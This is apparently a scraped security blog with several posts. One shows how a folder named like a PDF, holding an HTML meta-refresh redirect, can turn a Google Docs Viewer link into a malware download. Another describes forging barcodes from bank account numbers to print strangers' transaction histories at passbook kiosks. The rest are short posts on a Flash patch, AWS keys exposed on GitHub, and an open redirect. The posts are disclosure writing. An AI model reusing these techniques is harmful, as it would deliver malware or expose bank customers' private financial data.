Spreading malicious softwares via google document viewer



Google document or Google Docs is an awesome word processor offered by Google within its Google Drive service. The suite allows users to create and edit documents online while collaborating with other users in real-time. The best thing is that it serves as a collaborative tool for editing documents in real time. Documents can be shared, opened, and edited by multiple users simultaneously and users are able to see character-by-character changes as other collaborators make edits.

Earlier Google had a page that allowed users to quickly view documents online right from your browser. The Google Docs Viewer page was available at docs.google.com/viewer and drive.google.com/viewer. one could enter a document URL and Google generated a link to view it. This worked for a lot of file types: Microsoft Office files, PDFs, PostScript files and more.

 This feature is no longer available. The URL shows a 404 error. While the page is no longer available one can still use the Google Docs Viewer by pasting URL here

https://docs.google.com/viewer?url=[URL to pdf file]

For example

https://docs.google.com/viewer?url=https://bitcoin.org/bitcoin.pdf


The Flaw

I wondered what would happen if i give the URL of a website ( say a malicious one ). for testing i gave the url of my site. and to my surprise it showed a 500 error.

https://docs.google.com/viewer?url=http://www.hackatrick.com


Next i entered a link of a .gif image to see if it get opened or not. But i got a No preview error.


I also tried to enter a link of a website with an open redirect flaw. I wanted to see if it redirect to the site. but it ended up showing the html source code of the redirect page.


I realized that we cannot use open redirect here because if we use open redirect and try to redirect user then it shows the html source code of the redirect page. the link shows the html source code if the url ends with an .html extension and shows pdf files if the url ends with a .pdf extension and shows 500 error if we enter a domain name.

My goal was to redirect user to a site using google document . So I started thinking of an alternative way.

I created a directory in my website and named it as demo1.pdf . Inside the directory i created a html file and named it as index.html and added the folloing codes in it

 <html>
<head>
<title>A web page that points a browser to a different page after 2 seconds</title>
<meta http-equiv="refresh" content="0; URL=[link to malicious software]">
<meta name="keywords" content="automatic redirection">
</head>
<body>
test
manually.
</body>
</html>
This code redirects the index.html to a different site after a specific amount of time.

Now when I entered this url in the google document viewer site, google thought it to be a normal pdf file and not html so it did nt show the html source code. and since there was no pdf so it showed a 'no preview' message.



Now if an user gets this link, he will first see the url where it is clearly written as .pdf . next he will wonder if its a pdf file then why its not getting opened in the viewer ? and the third thing he will notice is the 3rd party apps suggested by google to open the pdf. the user willl have no clue that its not actually a pdf file. So if the user clicks on the view original button which is on the top of the viewer page, the user will land in the /demo1.pdf directory which have the html file which redirects to malicious software link.

In firefox it will show a popup with a save option and in chrome it will automatically start downloading.

In firebox browser it shows a popup with a save file option

 

In firefox











In chrome it automatically starts downloading

In chrome

I have reported the flaw to google security team but unfortunately this flaw does not come under their bug bounty program as they don't consider it to be a valid vulnerability, but it does not matter as the fun and the learning is more important. Google thanked me for informing them about the issue and they will fix it soon. Hopefully !!

This Serious Flaw in Indian banks can be used to know the bank balance, transaction history of any customer


Passbooks with Barcodes for automatic passbook printing
Passbooks with Barcodes for automatic passbook printing

With the advancement of technology everything around us is getting digitized. There was a time when people had to go to banks to withdraw money or deposit money. But now we have ATMs, net banking, mobile banking which made things much easier and faster for us. Banks are using technology so that they can reach to a wider section of people and also make the whole process fast, accurate and secure.

Earlier people had to go and consult a bank employee in order to update their bank passbook. But recently The state bank of India have installed an automatic passbook printer called ‘Swayam’ using which any customer can update their passbook just by inserting the passbook into the machine.

Unlike ATMs where one needs to insert credit/debit cards and enter password given by the banks in order to withdraw money, here in the automatic passbook printing machine the customer don’t need to insert any cards or enter passwords. All they need to do is just insert the passbook and they get their entire transaction details history printed in their passbook.

So how does the machine recognize the Respective user’s passbook?


The bank do a simple thing, they paste a barcode in each of the passbook and when the user inserts the passbook, the barcode scanner inside the machine scans the barcode and then the printer prints the entire transaction details in the passbook.

This really made me very curious as they don’t use any cards or passwords but only rely on barcodes which means there is some kind of encryption done on the data of the barcode.

So I went to different banks of my city to check which banks have actually implemented this automatic passbook printing machines. And also to see if they use the same barcode method or there is some other kind of security level added. I went to the following banks :



  • State Bank of India
  • Union bank 
  • Bank of india 
  • Indian bank 
  • Bank of baroda 
  • HDFC 
  • Canara Bank
  • UCO
  • Central Bank of India 
After going to the above banks I got to know that most of the banks have already implemented the automatic passbook printing machine while a few banks have not yet implemented but will soon do it.

One thing that was common in all the bank’s automatic passbook printing machine is that they all use barcodes and no other authentication.

Now I started analyzing the data of barcodes of various bank’s automatic passbook printing machine.

I took the following bank’s barcodes :

  • State Bank of India
  • UCO Bank
  • Canara Bank

State Bank of India


After scanning the barcode of State Bank of India I got to know that they use some kind of encryption on the barcode data and use the most popular ‘Code_128’ format of barcode. But I soon realized that actually the get barcodes stickers from a different location and when a customer asks for barcodes , they paste those barcode stickers and assign the data present in that sticker to the account number of the customer in their database .

For example : If the barcode data in the sticker  is ‘12345’ and bank account number is ‘ 9768xxxxx’ so when the customer ask for a barcode sticker, the bank paste the barcode sticker with the data ‘12345’ to the passbook of account no. ‘ 9768xxxxx’ . So whenever the customer inserts his passbook into the machine the machine will read the data ‘12345’ from the barcode and check the database and see which bank account it was assigned to. And after verifying, the machine will print the transaction details of the account no. ‘ 9768xxxxx’ in the passbook.

Passbooks with Barcodes for automatic passbook printing
Barcode data is different from the account number

UCO bank


After state bank of india I scanned the barcode of UCO bank to see what encryption or type of barcodes they use. I was shock to know that they use the same account number as the barcode data and it was of ‘Code_128’. There was no encryption done like it was in the case of state bank of india. Upon investing I got to know that Unlike state bank of india where they get the barcodes from a different place with barcode data and they assign account number to those data, here in UCO bank the employee themselves print barcodes.

Account number used as barcode data

Canara Bank


After going to state bank of india and UCO bank I went to canara bank. Canara bank too does the same as UCO bank. They too use the account number itself as the barcode data and it was of ‘Code_128’.

Account number used as barcode data



After investigating the above banks and their automatic printing machine I realized the dangerous security risk they possess.

The account number of a person is public. Means in order to get money we generally give our account number and it is safe to do so. But as we have seen in the above that in the automatic passbook printing machine the banks use the account number itself as the barcode data, it means if a person have the account number of any customers, he can easily make the barcode out of it and paste it in his passbook and get the complete transaction history which includes money withdrawal , money deposited, total bank balance etc with time and date of the customer.

I was not fully sure if my theory is correct so I planned to do it practically.


Case 1

With my father's Consent , I took my father's bank account number and made a barcode online where I added the account number itself as the barcode data . I removed the barcode sticker that the bank provided and pasted my barcode which i generated online and inserted the passbook into the machine.  My theory was successful. I was able to get the entire transaction history of my father's bank account printed on his passbook.

 Case 2

Once again, with my father's Consent , I took my father's bank account number and made a barcode online where I added the account number itself as the barcode data and this time I pasted the barcode in my passbook and not his, and inserted the passbook into the machine.  Once again My theory was successful. I was able to get the entire transaction history of my father's bank account printed on my passbook.


This is a great security flaw because the bank balance, transaction history, etc are meant to be private and if these information can be access by someone else then it can be very dangerous.

Is State Bank of India’s approach is good enough ?


No, even though they have added a level of security by making the barcode data different from the actual account number but just by some social engineering any one can take the data of an account as today with the help of smart phones any one can easily scan and read a barcode.

Banks should add some other level of authentication with barcodes like password/ biometrics so that no one can fake other customer's barcode and get transaction history.


I went to various banks and informed them about the issue but I was told that they only know to operate the machine and issue barcodes . So I mailed to the IT team of the respective banks which have implemented this machines but its been more than a week I did not get any reply from their end.

Email sent to IT team of different banks


I made this public so that people get aware of it and also since a few banks have not yet implemented it and are planning to do it, they refrain from doing the same mistake and secure its customers.

Update Adobe Flash urgently, or you might get hacked !


Update adobe flash player vulnerability

Last week, Adobe issued a security patch fixing a critical flaw in its Flash Player that could allow a remote hacker to take complete control of Windows, Mac and Linux computers. If you have not yet updated your flash player then you are at great security risk as this flaw is being exploited in the wild.

This Flaw can be used to remoletly control an user's computer. It was made public last week by security research firm Fireeye, who discovered the flaw and reported it to Adobe. The publisher has now made a patch available, which can be downloaded using the auto-updater included with Flash.

But this is not the end. An independent researcher Kafeine reported that the Flash flaw had also been incorporated into the Magnitude and Angler EK exploit kit. Since the method of exploiting the Flash vulnerability has now been built into malware kits that any malicious hacker could potentially use, makes the threat much more significant - as a wider number of criminals can now easily exploit it.

Magnitude and Angler EK exploit kit.


Adobe says the following versions of Adobe Flash are vulnerable to the exploit :


  • Adobe Flash Player 18.0.0.161 and earlier versions for Windows and Macintosh
  • Adobe Flash Player Extended Support Release version 13.0.0.292 and earlier 13.x versions for Windows and Macintosh
  •  Adobe Flash Player 11.2.202.466 and earlier 11.x versions for Linux

Adobe recommends users update their product installations to the latest versions :

  • Users of the Adobe Flash Player Desktop Runtime for Windows and Macintosh should update to Adobe Flash Player 18.0.0.194.
  • Users of the Adobe Flash Player Extended Support Release should update to Adobe Flash Player 13.0.0.296.
  •  Users of Adobe Flash Player for Linux should update to Adobe Flash Player 11.2.202.468 .Adobe Flash Player installed with Google Chrome and Adobe Flash Player installed with
  • Internet Explorer on Windows 8.x will automatically update to version 18.0.0.194.
If you have not yet updated to the latest version of flash then you can download the most recent version of Flash which always available from the Flash download page. Installing the latest version of Adobe Flash will leave the system secure once again.

Amazon Web Services(AWS) Secret Keys exposed on GitHub

Amazon Web Services(AWS) Secret Keys exposed on GitHub

Amazon Web Services(AWS) recently is informing developers to see for what they publish or share on GitHub, solely because the "secret keys" that AWS provide are openly shown on GitHub Search, it's not a Hack or a security Vulnerability but carelessness of the developer.  Before we get into details, I would like post a wiki description of GitHub and AWS.
Amazon Web Services is a collection of remote computing services that together make up a cloud computing platform, offered over the Internet by Amazon.com. The most central and well-known of these services are Amazon EC2 and Amazon S3.- Wikipedia
GitHub is a web-based hosting service for software development projects that use the Git revision control system, Where Developers Share there Codes and Help Themselves and Others.

What are The "secret keys" ?

“You can basically think of them as a username and password - they provide authentication to AWS services,Anyone who has access to those keys has access to that particular AWS account. From a security perspective it means they can basically go in and gain access to any of the files that are stored in the AWS account." said Ty Miller, founder of penetration testing firm Threat Intelligence.
Now That's a Huge Unknown Mistaken Threat to the Developers! Their Whole Database can be destroyed and the company reputation and the developer's status and what not! So before it's too late, Check your credentials on GitHub if you work with the AWS System, Moreover AWS already informed most of the developers about the issue. 

one example that fits good here is this one,
Several bloggers have admitted getting a shock after recieving a large bills for bandwidth usage they didn't initiate. For example, Luke Chadwick was hit with a US$3493 (A$3842) bill in December, because of unauthorised activity. To his relief, this was later refunded by AWS.

If you have any queries, don't hesitate to post it in the comments section. 



What Can Be Done Out Of A Hacked PC?

Some wild People Say "Hey! I Just Hacked a PC!", Some may just fake it but some may really have done it. So, What Do They Really Mean when the say that? This Article Will Discuss about In How many ways a Hacked PC Can Be Used, And in later articles I'll be explaining about each attack and how it works.

First Of All, a PC can be hacked in many ways, It maybe a PC/Server Whatever. But Once it's compromised, that particular PC becomes the paradise of the attacker. There's a whole lot of harm that an attacker can do to your PC, Yes! Your PC/Mobile That's connected to the internet can be compromised! That's why Always Keep you Antivirus Updated.

A Broad View of All the Attacks Takes me to 8 Categories,
  • Webserver
  • BotActivity
  • Virtual goods
  • Reputation Hijacking
  • Financial Credentials
  • Hostage Attacks
  • Account Credentials
  • E-mail Attacks
So, That's the prime 8. Take a look at the infographic that i made for a brief details of each.
In the Further posts, I'll explain how these attacks work with linux machines, because I am not really a very big windows fan. Also Windows Machines are most Vulnerable to these attacks!
So, This post was all about you knowing what kind of threats exists, and the first and a best step a normal PC user can take is update the antivirus software regularly.  

if you have any question, don't hesitate to post them in the comment section. 

Open Redirection found on sub domain of Stackoverflow



On open redirection was found by me on one of the sub-domain of Stackoverflow , A language-independent collaboratively edited question and answer site for programmers. It have a global alexa 54 which means lots of people visit the site daily and using this open redirection vulnerability an attackers can easily redirect the users to a malicious websites which can be used for phishing and similar attacks. Open Redirection occurs when vulnerable web page is being redirected to another web page via a user controllable input.